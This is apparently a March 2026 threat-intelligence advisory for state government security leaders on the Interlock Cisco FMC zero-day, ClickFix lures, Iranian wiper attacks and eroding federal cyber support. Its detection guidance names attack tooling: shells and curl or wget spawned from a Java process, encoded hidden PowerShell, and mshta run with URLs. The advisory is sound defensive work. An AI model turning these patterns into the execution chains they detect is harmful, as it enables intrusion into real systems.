Public Sector
Anomali Cyber Watch

Ransomware Groups Are Buying Zero-Days, ClickFix Is the New Macro, and Federal Cyber Support Is Eroding — What State CISOs Must Do This Week

Published on
March 19, 2026
<p>The week of March 10&ndash;18, 2026 delivered a series of developments that, taken individually, would each warrant a security advisory. Taken together, they represent a structural shift in the threat landscape facing U.S. state and local government IT organizations. A ransomware gang exploited a CVSS 10.0 zero-day in Cisco firewall management infrastructure for 36 days before a patch existed. A social engineering technique called &ldquo;ClickFix&rdquo; has been adopted by at least four unrelated threat groups &mdash; including nation-state operators &mdash; and now functions as a universal initial access method that never passes through email security at all. Iran&rsquo;s retaliatory cyber campaign continues to escalate with a 200,000-device wiper attack on a major U.S. corporation. And the federal agencies that state governments have historically relied on for cyber support are losing staff and delaying regulations, while Congress is letting intelligence-sharing authorities lapse &mdash; eight months before the 2026 midterm elections.</p> <p><strong> This is not a drill. This is the new operating environment. </strong></p> <h2><strong> What Changed This Week </strong></h2> <p><strong> Six developments demand immediate attention from state IT leadership: </strong></p> <ol> <li><strong> Interlock ransomware exploited a Cisco Secure Firewall Management Center zero-day (CVE-2026-20131, CVSS 10.0) for 36 days before disclosure </strong> &mdash; and has already hit a U.S. municipal government. This is the first confirmed case of a ransomware group operationalizing a true zero-day in critical network infrastructure.</li> <li><strong> ConnectWise ScreenConnect disclosed a critical session hijacking vulnerability (CVE-2026-3564, CVSS 9.0) </strong> that allows attackers to forge admin sessions using extracted cryptographic keys. 
On-premises instances require manual patching &mdash; cloud instances were auto-updated.</li> <li><strong> ClickFix social engineering has been adopted by four or more distinct threat groups </strong>, including the LeakNet and Interlock ransomware gangs, the Termite/Velvet Tempest ransomware operation, and Russia&rsquo;s APT28 (Fancy Bear). The technique tricks users into pasting malicious commands from websites into the Run dialog, Windows Terminal, or a PowerShell prompt; the lure is delivered by the web page itself, so email-based security controls are never in the path.</li> <li><strong> Iran-linked Handala (UNC5203) continues its post-Operation Epic Fury retaliation campaign. </strong> The Stryker wiper attack &mdash; claiming 200,000 devices destroyed &mdash; has generated class action lawsuits as of March 18, while the company still works to restore global IT systems.</li> <li><strong> CISA workforce reductions, CIRCIA regulatory delays, and the pending expiration of the 2015 cyber threat intelligence sharing framework (September 2026) </strong> are eroding the federal support structure that state governments depend on for election security, incident response, and threat intelligence.</li> <li><strong> Critical perimeter vulnerabilities across Fortinet and Cisco products are under active exploitation. 
</strong> FortiGate CVE-2025-59718 (CVSS 9.8) is being used to create rogue admin accounts in the wild, FortiVoice/Mail/NDR CVE-2025-32756 (CVSS 9.8) enables unauthenticated RCE, and Trane Tracer BMS vulnerabilities (CVE-2026-28252 through CVE-2026-28256) expose building management systems via hardcoded credentials and authentication bypass.</li> </ol> <h2><strong> Threat Timeline: Key Events (January &ndash; March 2026) </strong></h2> <table> <thead> <tr> <th> <p><strong> Date </strong></p> </th> <th> <p><strong> Event </strong></p> </th> <th> <p><strong> Significance </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong> Jan 26 </strong></p> </td> <td> <p>Interlock begins exploiting CVE-2026-20131 (Cisco FMC)</p> </td> <td> <p>Zero-day exploitation begins &mdash; 36 days before public disclosure</p> </td> </tr> <tr> <td> <p><strong> Feb 2 </strong></p> </td> <td> <p>Qilin ransomware claims Tulsa airport breach</p> </td> <td> <p>Continued municipal government targeting by established ransomware group</p> </td> </tr> <tr> <td> <p><strong> Feb 25 </strong></p> </td> <td> <p>Cisco discloses CVE-2026-20127 (SD-WAN Manager, CVSS 10.0)</p> </td> <td> <p>Added to CISA KEV; second critical Cisco infrastructure vulnerability in weeks</p> </td> </tr> <tr> <td> <p><strong> Mar 4 </strong></p> </td> <td> <p>Cisco patches CVE-2026-20131 (FMC)</p> </td> <td> <p>Disclosure ends Interlock&rsquo;s zero-day window &mdash; but damage already done</p> </td> </tr> <tr> <td> <p><strong> Mar 4&ndash;5 </strong></p> </td> <td> <p>Europol/Microsoft take down Tycoon2FA PhaaS platform</p> </td> <td> <p>Major AiTM phishing-as-a-service disrupted; successor &ldquo;Starkiller&rdquo; already identified</p> </td> </tr> <tr> <td> <p><strong> Mar 7 </strong></p> </td> <td> <p>Termite/Velvet Tempest adopts ClickFix + CastleRAT</p> </td> <td> <p>Second ransomware group adopts ClickFix for initial access</p> </td> </tr> <tr> <td> <p><strong> Mar 10 </strong></p> </td> <td> <p>SentinelOne 
reports FortiGate SSO bypass exploitation (CVE-2025-59718)</p> </td> <td> <p>Rogue admin accounts being created on FortiGate firewalls in the wild</p> </td> </tr> <tr> <td> <p><strong> Mar 11&ndash;13 </strong></p> </td> <td> <p>Handala claims Stryker wiper attack; 200K devices reported wiped</p> </td> <td> <p>Largest Iranian destructive cyber operation against a U.S. company to date</p> </td> </tr> <tr> <td> <p><strong> Mar 13 </strong></p> </td> <td> <p>Chrome 146 emergency patches for two zero-days</p> </td> <td> <p>Active exploitation in the wild; enterprise browser fleets at risk</p> </td> </tr> <tr> <td> <p><strong> Mar 16 </strong></p> </td> <td> <p>CNAS reports: Congress has twice let cyber intel sharing authority lapse</p> </td> <td> <p>CISA 2015 voluntary sharing framework expires September 2026</p> </td> </tr> <tr> <td> <p><strong> Mar 17 </strong></p> </td> <td> <p>LeakNet ransomware debuts with ClickFix + Deno in-memory loader</p> </td> <td> <p>New ransomware actor; third group to adopt ClickFix in two weeks</p> </td> </tr> <tr> <td> <p><strong> Mar 17 </strong></p> </td> <td> <p>Reporting confirms CISA election security staff and programs &ldquo;hollowed out&rdquo;</p> </td> <td> <p>State governments losing federal cyber support ahead of 2026 midterms</p> </td> </tr> <tr> <td> <p><strong> Mar 17 </strong></p> </td> <td> <p>Trane Tracer BMS vulnerabilities disclosed (CVE-2026-28252 through CVE-2026-28256)</p> </td> <td> <p>Hardcoded credentials and auth bypass in building management systems</p> </td> </tr> <tr> <td> <p><strong> Mar 18 </strong></p> </td> <td> <p>Amazon reveals Interlock&rsquo;s 36-day Cisco FMC zero-day exploitation; city of Saint Paul named as victim</p> </td> <td> <p>Ransomware-as-zero-day confirmed; government targeting confirmed</p> </td> </tr> <tr> <td> <p><strong> Mar 18 </strong></p> </td> <td> <p>ConnectWise discloses CVE-2026-3564 (ScreenConnect, CVSS 9.0)</p> </td> <td> <p>Critical supply chain risk for any agency using 
on-premises ScreenConnect</p> </td> </tr> </tbody> </table> <h2><strong> Threat Analysis </strong></h2> <h3><strong> 1. Interlock Ransomware and the Cisco FMC Zero-Day: A New Paradigm </strong></h3> <p>The most consequential development this week is not just another vulnerability &mdash; it is a capability shift. The Interlock ransomware gang possessed and operationalized a zero-day exploit in Cisco Secure Firewall Management Center (CVE-2026-20131) for <strong> 36 days </strong> before Cisco&rsquo;s March 4 patch. Amazon&rsquo;s threat intelligence team confirmed exploitation dating to January 26, 2026.</p> <p>This matters because ransomware groups have historically been &ldquo;N-day&rdquo; operators &mdash; they exploit known vulnerabilities after patches are released, targeting organizations that are slow to update. A financially motivated criminal group acquiring and deploying a zero-day in critical network management infrastructure was, until now, a capability associated almost exclusively with nation-state actors. The nearest precedent is Cl0p&rsquo;s 2023 zero-day campaigns against managed file transfer products (GoAnywhere MFT and MOVEit Transfer), which targeted data-transfer applications rather than the management plane of the network perimeter.</p> <p><strong> CVE-2026-20131 </strong> is a Java deserialization vulnerability in the Cisco FMC web management interface that allows unauthenticated remote code execution as root. CVSS score: <strong> 10.0 </strong> &mdash; the maximum possible severity. Interlock&rsquo;s post-exploitation toolkit included <strong> NodeSnake RAT </strong> (a JavaScript-based remote access trojan using WebSocket C2 with RC4 encryption), <strong> Slopoly </strong> (an AI-generated backdoor that evades signature-based detection), and the <strong> ClickFix </strong> social engineering technique for additional access vectors.</p> <p>Confirmed victims include the <strong> city of Saint Paul </strong> (municipal government), Texas Tech University System, DaVita, and Kettering Health. 
Given the 36-day exploitation window, additional victims &mdash; potentially including state agencies &mdash; may not yet be publicly known.</p> <p><strong> The bottom line for state CISOs: </strong> If your organization operates Cisco Secure Firewall Management Center, assume compromise until you can verify patch status and complete a threat hunt. The exploitation window was long enough that patching alone is insufficient &mdash; you need to look for evidence of compromise.</p> <h3><strong> 2. ClickFix: The New Macro </strong></h3> <p>Between March 7 and March 18, the ClickFix social engineering technique was adopted by at least four distinct, unrelated threat groups:</p> <ul> <li><strong> LeakNet </strong> ransomware (ClickFix via compromised WordPress sites &rarr; Deno in-memory loader &rarr; ransomware)</li> <li><strong> Interlock </strong> ransomware (ClickFix as an auxiliary initial access vector alongside the Cisco FMC exploit)</li> <li><strong> Termite / Velvet Tempest </strong> ransomware (ClickFix &rarr; CastleRAT + DonutLoader &rarr; ransomware)</li> <li><strong> APT28 / Fancy Bear </strong> (Russia &mdash; ClickFix via fake reCAPTCHA pages for credential theft)</li> </ul> <p>Additionally, multiple infostealer campaigns are using ClickFix across 250+ compromised WordPress sites, and at least one compromised U.S. Senate candidate&rsquo;s official website was observed serving ClickFix lures.</p> <p><strong> How ClickFix works: </strong> Victims visit a compromised or malicious website that displays a fake error message &mdash; often mimicking a browser update, CAPTCHA verification, or document viewer. The page instructs the user to &ldquo;fix&rdquo; the error by copying a command and pasting it into Windows Terminal, the Run dialog, or PowerShell. In most lures the page&rsquo;s JavaScript writes the command to the clipboard itself, so the user only sees instructions such as &ldquo;press Win+R, then Ctrl+V, then Enter&rdquo; and never reads what is pasted. The command is typically a one-line PowerShell or mshta.exe invocation, often Base64-encoded, that downloads and executes malware. 
The technique is devastatingly simple and effective because it exploits user trust and bypasses every email-based security control state agencies have invested in.</p> <p><strong> Why this matters for state government: </strong> State employees routinely visit external websites &mdash; news outlets, vendor portals, legislative reference sites, constituent service platforms. Any of these could be compromised to serve ClickFix lures. The technique requires no email delivery, no attachment, and no exploit &mdash; just a user following instructions on a webpage.</p> <h3><strong> 3. Iranian Cyber Retaliation: Escalating and Expanding </strong></h3> <p>The post-Operation Epic Fury Iranian cyber retaliation campaign continues to escalate. The Handala group (also tracked as <strong> UNC5203 </strong> and <strong> Cotton Sandstorm </strong> by Microsoft) claimed responsibility for a wiper attack on Stryker, a major U.S. medical device manufacturer, asserting that 200,000 devices were destroyed. As of March 18, class action lawsuits are accumulating while Stryker continues restoration efforts.</p> <p>Handala/UNC5203 is assessed to be linked to Iran&rsquo;s <strong> Islamic Revolutionary Guard Corps (IRGC) </strong> . Their targeting profile includes U.S. government, energy, financial services, and technology sectors. Separately, <strong> MuddyWater </strong> &mdash; a distinct Iranian threat group affiliated with Iran&rsquo;s <strong> Ministry of Intelligence and Security (MOIS) </strong> &mdash; continues operations using the <strong> Dindoor </strong> backdoor, and broader Iranian cyber activity remains at elevated tempo.</p> <p><strong> For state government: </strong> Iran&rsquo;s retaliatory operations have explicitly targeted U.S. government entities. State agencies &mdash; particularly those managing critical infrastructure (water, energy, transportation) &mdash; are within the target set. 
The Stryker attack demonstrated that Iranian actors are willing and able to deploy destructive wiper malware at scale against U.S. organizations.</p> <h3><strong> 4. The Federal Support Gap: CISA Erosion and Regulatory Uncertainty </strong></h3> <p>State governments have historically relied on CISA for election security support, incident response assistance, and threat intelligence sharing. Three concurrent developments are undermining that support structure:</p> <ul> <li><strong> Workforce reductions </strong> have &ldquo;hollowed out key staff and programs&rdquo; that helped states safeguard voting systems, per multiple reports from March 17.</li> <li><strong> CIRCIA (Cyber Incident Reporting for Critical Infrastructure Act) implementation </strong> has been delayed &mdash; DHS shutdown postponed town halls, and the final rule timeline has slipped.</li> <li><strong> The Cybersecurity Information Sharing Act of 2015 (&ldquo;CISA 2015&rdquo;, the statute rather than the agency), whose liability protections underpin the voluntary cyber threat intelligence sharing framework, expires in September 2026. </strong> Congress has already twice allowed related cyber threat intelligence sharing authorization to lapse in the past five months.</li> </ul> <p>This creates a compounding problem: the threat environment is intensifying (ransomware zero-days, Iranian retaliation, ClickFix proliferation) at the exact moment that federal support capacity is diminishing. The practical consequence is that capabilities state CISOs previously sourced from federal partners (threat intelligence, surge incident response, election security assistance) now have to be sourced in-state or through peer networks.</p> <h3><strong> 5. 
Supply Chain and Perimeter Vulnerabilities: Cisco, Fortinet, ConnectWise </strong></h3> <p>State government IT infrastructure faces simultaneous critical vulnerabilities across three major vendors:</p> <table> <thead> <tr> <th> <p><strong> Vendor / Product </strong></p> </th> <th> <p><strong> CVE </strong></p> </th> <th> <p><strong> CVSS </strong></p> </th> <th> <p><strong> Status </strong></p> </th> <th> <p><strong> Risk to State IT </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p>Cisco Secure FMC</p> </td> <td> <p>CVE-2026-20131</p> </td> <td> <p>10.0</p> </td> <td> <p>Active zero-day exploitation (since Jan 26)</p> </td> <td> <p><strong> Critical </strong> &mdash; firewall management compromise enables full network access</p> </td> </tr> <tr> <td> <p>Cisco SD-WAN Manager</p> </td> <td> <p>CVE-2026-20127</p> </td> <td> <p>10.0</p> </td> <td> <p>CISA KEV; active exploitation confirmed</p> </td> <td> <p><strong> Critical </strong> &mdash; inter-agency WAN fabric at risk</p> </td> </tr> <tr> <td> <p>Fortinet FortiGate</p> </td> <td> <p>CVE-2025-59718</p> </td> <td> <p>9.8</p> </td> <td> <p>Active exploitation; rogue admin accounts observed</p> </td> <td> <p><strong> High </strong> &mdash; perimeter firewall compromise; credential and config theft</p> </td> </tr> <tr> <td> <p>Fortinet FortiVoice/Mail/NDR</p> </td> <td> <p>CVE-2025-32756</p> </td> <td> <p>9.8</p> </td> <td> <p>Active exploitation</p> </td> <td> <p><strong> High </strong> &mdash; RCE via crafted HTTP cookie across multiple Fortinet products</p> </td> </tr> <tr> <td> <p>ConnectWise ScreenConnect</p> </td> <td> <p>CVE-2026-3564</p> </td> <td> <p>9.0</p> </td> <td> <p>Exploitation attempts observed; on-prem requires manual patch</p> </td> <td> <p><strong> High </strong> &mdash; IT support tool compromise = full remote access to endpoints</p> </td> </tr> <tr> <td> <p>Trane Tracer BMS</p> </td> <td> <p>CVE-2026-28252 &ndash; 28256</p> </td> <td> <p>Varies</p> </td> <td> <p>Disclosed; patches 
available</p> </td> <td> <p><strong> Medium-High </strong> &mdash; hardcoded credentials and auth bypass in building management</p> </td> </tr> </tbody> </table> <h2><strong> Predictive Analysis: What Comes Next </strong></h2> <p>Based on the intelligence collected through March 18, 2026, we assess the following probabilities for the next 7&ndash;30 days:</p> <table> <thead> <tr> <th> <p><strong> Scenario </strong></p> </th> <th> <p><strong> Probability </strong></p> </th> <th> <p><strong> Basis </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p>Additional ClickFix-based ransomware campaigns emerge targeting government</p> </td> <td> <p><strong> High (75%) </strong></p> </td> <td> <p>Four groups adopted the technique in two weeks; it is trivially replicable and bypasses email security</p> </td> </tr> <tr> <td> <p>Interlock claims additional government/education/healthcare victims from the Jan 26 &ndash; Mar 4 exploitation window</p> </td> <td> <p><strong> Moderate-High (60%) </strong></p> </td> <td> <p>36-day zero-day window against internet-facing management consoles; victim discovery typically lags exploitation by weeks</p> </td> </tr> <tr> <td> <p>Iranian cyber operations expand to additional U.S. critical infrastructure or government targets</p> </td> <td> <p><strong> Moderate (45%) </strong></p> </td> <td> <p>Handala/UNC5203 and MuddyWater remain active; post-Operation Epic Fury retaliation tempo has not decreased</p> </td> </tr> <tr> <td> <p>A U.S. 
state or local government entity is publicly named as a ransomware victim</p> </td> <td> <p><strong> Moderate (40%) </strong></p> </td> <td> <p>Elevated activity across Interlock, Qilin, and LeakNet; municipal government is a confirmed target for multiple groups</p> </td> </tr> <tr> <td> <p>CVE-2026-3564 (ScreenConnect) is exploited in the wild against MSP/government targets</p> </td> <td> <p><strong> Moderate (40%) </strong></p> </td> <td> <p>Exploitation attempts already observed; ScreenConnect is widely deployed in government IT support</p> </td> </tr> <tr> <td> <p>Successor AiTM phishing platforms (Starkiller) reach operational scale, targeting M365 GCC tenants</p> </td> <td> <p><strong> Low-Moderate (30%) </strong></p> </td> <td> <p>Tycoon2FA takedown created a temporary gap; criminal ecosystem historically reconstitutes within 4&ndash;6 weeks</p> </td> </tr> </tbody> </table> <h2><strong> SOC Operational Guidance </strong></h2> <h3><strong> Detection Priorities </strong></h3> <p><strong> ClickFix Execution Chain </strong> &mdash; The highest-priority detection gap for most state SOCs today.</p> <ul> <li><strong> Hunt Hypothesis: </strong> State employees visiting compromised websites are being instructed to paste malicious commands into Windows Terminal, PowerShell, or the Run dialog. 
Look for command-line processes spawned from unusual parent processes.</li> <li><strong> Detection Logic: </strong></li> </ul> <ul> <li>PowerShell or cmd.exe spawned by Windows Terminal (WindowsTerminal.exe) or by explorer.exe (the parent of anything launched from the Run dialog) with Base64-encoded arguments (-EncodedCommand / -enc) or a hidden-window switch (-WindowStyle Hidden / -w h). On Windows 11, WindowsTerminal.exe is the default console host, so the parent alone is not a signal; the argument pattern in an interactive session is &mdash; <strong> T1059.001 (PowerShell), T1204.004 (User Execution: Malicious Copy and Paste) </strong></li> <li>mshta.exe or wscript.exe spawned directly by explorer.exe (the Run dialog path) or by a console shell, with a URL on the command line &mdash; <strong> T1218.005 (Mshta) </strong></li> <li>Any execution of deno.exe on state endpoints (the Deno runtime should not exist in standard government builds; baseline developer workstations first so they can be allowlisted rather than generate noise) &mdash; <strong> T1059.007 (JavaScript), T1620 (Reflective Code Loading) </strong></li> <li>curl.exe or Invoke-WebRequest commands executed interactively (not from scheduled tasks or known automation) &mdash; <strong> T1105 (Ingress Tool Transfer) </strong></li> </ul> <p><strong> Cisco FMC Compromise Indicators </strong></p> <ul> <li><strong> Hunt Hypothesis: </strong> If your organization runs Cisco Secure FMC, the 36-day exploitation window (Jan 26 &ndash; Mar 4) may have been used to establish persistent access.</li> <li><strong> Detection Logic: </strong></li> </ul> <ul> <li>Shells, interpreters, or download utilities (sh, bash, perl, python, curl, wget) spawned as children of the FMC web-service Java process; the deserialization bug executes inside that process, so its child processes are the first place to look &mdash; <strong> T1190 (Exploit Public-Facing Application) </strong></li> <li>WebSocket connections from FMC to external IPs (NodeSnake RAT C2 uses WebSocket with RC4 encryption) &mdash; <strong> T1071.001 (Web Protocols) </strong></li> <li>New or modified user accounts on FMC that were not created through change management &mdash; <strong> T1136 (Create Account) </strong></li> <li>SSH lateral movement from FMC to internal Linux hosts &mdash; <strong> T1021.004 (SSH) </strong></li> </ul> <p><strong> FortiGate Rogue Account Detection </strong></p> <ul> <li><strong> Hunt Hypothesis: </strong> Attackers exploiting CVE-2025-59718 are creating unauthorized admin accounts and exfiltrating firewall configurations.</li> <li><strong> Detection Logic: </strong></li> 
</ul> <ul> <li>Audit all FortiGate admin accounts against authorized personnel lists &mdash; <strong> T1078 (Valid Accounts) </strong></li> <li>Review Sieve mail forwarding rules on FortiMail appliances for unauthorized entries (this check applies to the mail tier; FortiGate itself has no mail rules) &mdash; <strong> T1114.003 (Email Forwarding Rule) </strong></li> <li>Check for configuration exports or SNMP community string changes &mdash; <strong> T1005 (Data from Local System) </strong></li> </ul> <p><strong> ConnectWise ScreenConnect Session Hijacking </strong></p> <ul> <li><strong> Hunt Hypothesis: </strong> Attackers with access to ScreenConnect server cryptographic material can forge admin sessions.</li> <li><strong> Detection Logic: </strong></li> </ul> <ul> <li>Monitor for ScreenConnect admin sessions originating from unexpected IP ranges &mdash; <strong> T1219 (Remote Access Software) </strong></li> <li>Audit ScreenConnect server access logs for access to configs, backups, logs, and extensions directories &mdash; <strong> T1078 (Valid Accounts), T1068 (Exploitation for Privilege Escalation) </strong></li> </ul> <p><strong> Iranian Wiper Preparedness </strong></p> <ul> <li><strong> Hunt Hypothesis: </strong> Iranian threat actors (Handala/UNC5203, IRGC-affiliated) may target state government systems with destructive wiper malware, potentially leveraging compromised identity infrastructure (Active Directory, Intune/SCCM).</li> <li><strong> Detection Logic: </strong></li> </ul> <ul> <li>Mass file deletion or overwrite operations across multiple systems simultaneously &mdash; <strong> T1485 (Data Destruction) </strong></li> <li>Unexpected service stops across critical infrastructure &mdash; <strong> T1489 (Service Stop) </strong></li> <li>Anomalous Intune/SCCM policy deployments outside change windows &mdash; <strong> T1072 (Software Deployment Tools) </strong></li> </ul> <h3><strong> Blocking Guidance </strong></h3> <p>Specific IOCs (IP addresses, domains, and file hashes) for the campaigns discussed in this report are available through <strong> Anomali 
ThreatStream </strong> and partner feeds. State SOC teams should ensure the following threat intelligence feeds are active and ingesting:</p> <ul> <li>Amazon AWS Security Blog IOCs (Interlock/Cisco FMC campaign)</li> <li>CISA KEV catalog (CVE-2026-20127, CVE-2026-20131)</li> <li>MS-ISAC advisories for state/local government</li> </ul> <h2><strong> Sector-Specific Defensive Priorities </strong></h2> <h3><strong> State Government Agencies (Executive, Legislative, Judicial) </strong></h3> <ul> <li><strong> Priority 1: </strong> Verify Cisco Secure FMC and SD-WAN Manager patch status across all agencies. Conduct threat hunt on FMC appliances for the Jan 26 &ndash; Mar 4 exploitation window.</li> <li><strong> Priority 2: </strong> Issue ClickFix awareness alert to all state employees with visual examples of the fake error messages. Emphasize: never paste commands from websites into any command prompt or terminal.</li> <li><strong> Priority 3: </strong> Audit ConnectWise ScreenConnect instances used by IT help desks. Confirm on-premises instances are updated to version 26.1.</li> <li><strong> Priority 4: </strong> Begin contingency planning for reduced CISA support. Engage MS-ISAC and state CISO council for alternative threat intelligence sharing.</li> </ul> <h3><strong> Financial Services (State Treasury, Revenue, Payment Processing) </strong></h3> <ul> <li><strong> Priority 1: </strong> Review third-party payment processor security posture. The ScreenConnect vulnerability creates supply chain risk for vendors providing citizen payment portal support.</li> <li><strong> Priority 2: </strong> Strengthen AiTM phishing defenses for financial systems. The Starkiller PhaaS successor to Tycoon2FA specifically targets M365 credentials &mdash; enforce hardware token MFA and conditional access policies requiring compliant devices.</li> <li><strong> Priority 3: </strong> Iranian threat actors (Handala/UNC5203 and MuddyWater) explicitly target financial services. 
Ensure wire transfer and payment authorization systems have out-of-band verification procedures.</li> </ul> <h3><strong> Energy and Water (State-Regulated Utilities, OT/ICS) </strong></h3> <ul> <li><strong> Priority 1: </strong> Assess Trane Tracer BMS exposure in state-managed facilities. CVE-2026-28252 through CVE-2026-28256 include hardcoded credentials and authentication bypass vulnerabilities enabling root access. Patch to Tracer SC+ v6.30.2313.</li> <li><strong> Priority 2: </strong> Segment OT/SCADA networks from enterprise IT. Iranian threat actors have demonstrated willingness to target critical infrastructure, and the Dragos OT threat report (March 2026) warns of state-affiliated actors pre-positioning for OT attacks that operators may not detect.</li> <li><strong> Priority 3: </strong> Ensure Cisco SD-WAN infrastructure connecting utility control centers is patched against CVE-2026-20127 (CVSS 10.0, CISA KEV).</li> </ul> <h3><strong> Healthcare (State Health Agencies, Medicaid Systems) </strong></h3> <ul> <li><strong> Priority 1: </strong> The Stryker wiper attack demonstrates that healthcare-adjacent organizations are active Iranian targets. Review backup and recovery procedures for health information systems.</li> <li><strong> Priority 2: </strong> Interlock ransomware has confirmed healthcare victims (DaVita, Kettering Health). Ensure healthcare data systems have network segmentation, offline backups, and tested restoration procedures.</li> <li><strong> Priority 3: </strong> Qilin ransomware continues to target government and healthcare globally. Monitor for Qilin indicators via MS-ISAC and sector ISACs.</li> </ul> <h3><strong> Aviation and Transportation / Logistics </strong></h3> <ul> <li><strong> Priority 1: </strong> Qilin ransomware claimed the Tulsa airport breach (February 2026). 
State-managed airports and transportation authorities should verify ransomware resilience &mdash; particularly backup integrity and network segmentation of operational technology.</li> <li><strong> Priority 2: </strong> Cisco SD-WAN infrastructure connecting transportation management centers is at risk from CVE-2026-20127. Verify patch status.</li> <li><strong> Priority 3: </strong> Supply chain risk from compromised MSP tools (ScreenConnect) extends to transportation logistics vendors. Audit vendor remote access tools.</li> </ul> <h2><strong> Prioritized Defense Recommendations </strong></h2> <h3><strong> Immediate (24&ndash;48 Hours) </strong></h3> <table> <thead> <tr> <th> <p><strong> # </strong></p> </th> <th> <p><strong> Action </strong></p> </th> <th> <p><strong> Owner </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p>1</p> </td> <td> <p><strong> Verify Cisco Secure FMC patch status </strong> against CVE-2026-20131 (CVSS 10.0). If unpatched, initiate emergency patching and threat hunt for indicators of compromise from the Jan 26 &ndash; Mar 4 exploitation window.</p> </td> <td> <p>Network Security</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p><strong> Verify ConnectWise ScreenConnect on-premises instances </strong> are updated to version 26.1. Restrict access to server configuration and backup directories.</p> </td> <td> <p>IT Support / Endpoint Management</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p><strong> Push Chrome 146.0.7680.75+ </strong> to all managed endpoints via enterprise browser management. Two zero-days are under active exploitation.</p> </td> <td> <p>Endpoint Management</p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p><strong> Issue ClickFix awareness communication </strong> to all state employees. Include visual examples of fake error messages. Key message: <em> Never copy and paste commands from a website into any command prompt, terminal, or Run dialog. 
</em></p> </td> <td> <p>CISO Office / Security Awareness</p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p><strong> Brief executive leadership </strong> on the Interlock zero-day, Iranian wiper escalation, and CISA support erosion. Frame as a risk posture change requiring sustained attention, not a single incident.</p> </td> <td> <p>CISO</p> </td> </tr> </tbody> </table> <h3><strong> 7-Day Actions </strong></h3> <table> <thead> <tr> <th> <p><strong> # </strong></p> </th> <th> <p><strong> Action </strong></p> </th> <th> <p><strong> Owner </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p>6</p> </td> <td> <p><strong> Audit all FortiGate firewall admin accounts </strong> against authorized personnel lists. Check for rogue accounts, unauthorized Sieve forwarding rules, and configuration exports. Verify patch status against CVE-2025-59718 (CVSS 9.8).</p> </td> <td> <p>Network Security</p> </td> </tr> <tr> <td> <p>7</p> </td> <td> <p><strong> Inventory Trane Tracer BMS systems </strong> across all state-managed facilities. Schedule patching to Tracer SC+ v6.30.2313 for CVE-2026-28252 through CVE-2026-28256.</p> </td> <td> <p>Facilities / OT Security</p> </td> </tr> <tr> <td> <p>8</p> </td> <td> <p><strong> Verify Cisco SD-WAN Manager </strong> instances are at release 20.18+ per CISA KEV for CVE-2026-20127 (CVSS 10.0).</p> </td> <td> <p>Network Security</p> </td> </tr> <tr> <td> <p>9</p> </td> <td> <p><strong> Engage MS-ISAC and state CISO council </strong> to identify alternative threat intelligence sharing mechanisms in anticipation of the CISA 2015 framework expiration (September 2026).</p> </td> <td> <p>CISO Office / Policy</p> </td> </tr> <tr> <td> <p>10</p> </td> <td> <p><strong> Review M365 conditional access policies. 
</strong> Enforce compliant device requirements and implement token binding where available to counter AiTM/Starkiller phishing.</p> </td> <td> <p>IAM / Cloud Security</p> </td> </tr> </tbody> </table> <h3><strong> 30-Day Actions </strong></h3> <table> <thead> <tr> <th> <p><strong> # </strong></p> </th> <th> <p><strong> Action </strong></p> </th> <th> <p><strong> Owner </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p>11</p> </td> <td> <p><strong> Deploy ClickFix detection rules </strong> in EDR/SIEM: clipboard-paste execution via Windows Terminal, PowerShell with encoded commands spawned from explorer.exe, Deno runtime execution on any endpoint.</p> </td> <td> <p>Detection Engineering</p> </td> </tr> <tr> <td> <p>12</p> </td> <td> <p><strong> Conduct Iranian wiper tabletop exercise. </strong> Scenario: Handala/UNC5203 (IRGC-affiliated) deploys destructive malware via compromised identity infrastructure (AD/Intune). Test backup restoration for Active Directory, M365, and critical agency systems. Validate that recovery time objectives are achievable.</p> </td> <td> <p>CISO Office / IR Team</p> </td> </tr> <tr> <td> <p>13</p> </td> <td> <p><strong> Perform Cisco product inventory </strong> across all agencies. Two independent CVSS 10.0 exploitation campaigns targeting different Cisco products in the same quarter represents systemic vendor concentration risk. Establish a unified Cisco vulnerability response process.</p> </td> <td> <p>Enterprise Architecture / Network Security</p> </td> </tr> <tr> <td> <p>14</p> </td> <td> <p><strong> Evaluate browser isolation solutions </strong> to address the ClickFix gap. 
Current security architecture is optimized for email-borne threats; ClickFix operates entirely through web browsing and bypasses that investment.</p> </td> <td> <p>Security Architecture</p> </td> </tr> <tr> <td> <p>15</p> </td> <td> <p><strong> Review and update election security incident response plans </strong> for 2026 midterms, accounting for reduced CISA support capacity. Identify state-level resources and mutual aid agreements that can fill the gap.</p> </td> <td> <p>CISO Office / Elections IT</p> </td> </tr> </tbody> </table> <h2><strong> Bottom Line </strong></h2> <p>Three structural shifts are converging to create the most challenging threat environment state government CISOs have faced:</p> <p><strong> First, the capability gap between nation-states and criminal groups is closing. </strong> Interlock&rsquo;s use of a zero-day in Cisco FMC &mdash; a capability that five years ago was the preserve of nation-state actors &mdash; signals that the ransomware ecosystem has matured to the point where criminal operators can acquire or develop zero-day exploits for critical infrastructure. The deployment of AI-generated malware (Slopoly) in the same campaign further demonstrates that criminal groups are adopting advanced techniques at an accelerating pace.</p> <p><strong> Second, initial access techniques are evolving faster than defenses. </strong> State governments invested heavily in email security &mdash; and those investments still matter. But ClickFix renders them partially irrelevant by moving the initial access vector to the web browser. Four unrelated threat groups adopted the same technique within two weeks. This is the kind of rapid, cross-ecosystem adoption that characterized macro-enabled document attacks in the 2018&ndash;2022 era. The defense community is behind the curve.</p> <p><strong> Third, the federal safety net is fraying. 
</strong> CISA workforce reductions, CIRCIA implementation delays, and the pending expiration of intelligence sharing authorities are not abstract policy concerns &mdash; they directly affect the threat intelligence, incident response support, and election security assistance that state governments receive. State CISOs who have relied on federal partnerships must now build or strengthen organic capabilities and peer-to-peer sharing networks.</p> <p>None of these shifts will reverse themselves. The question is not whether state government will face a major cyber incident in 2026 &mdash; it is whether your organization will be prepared when it happens.</p> <p>Patch the Cisco FMC. Update ScreenConnect. Warn your employees about ClickFix. Hunt your networks. Test your backups. And start planning for a world where you may need to stand on your own.</p>
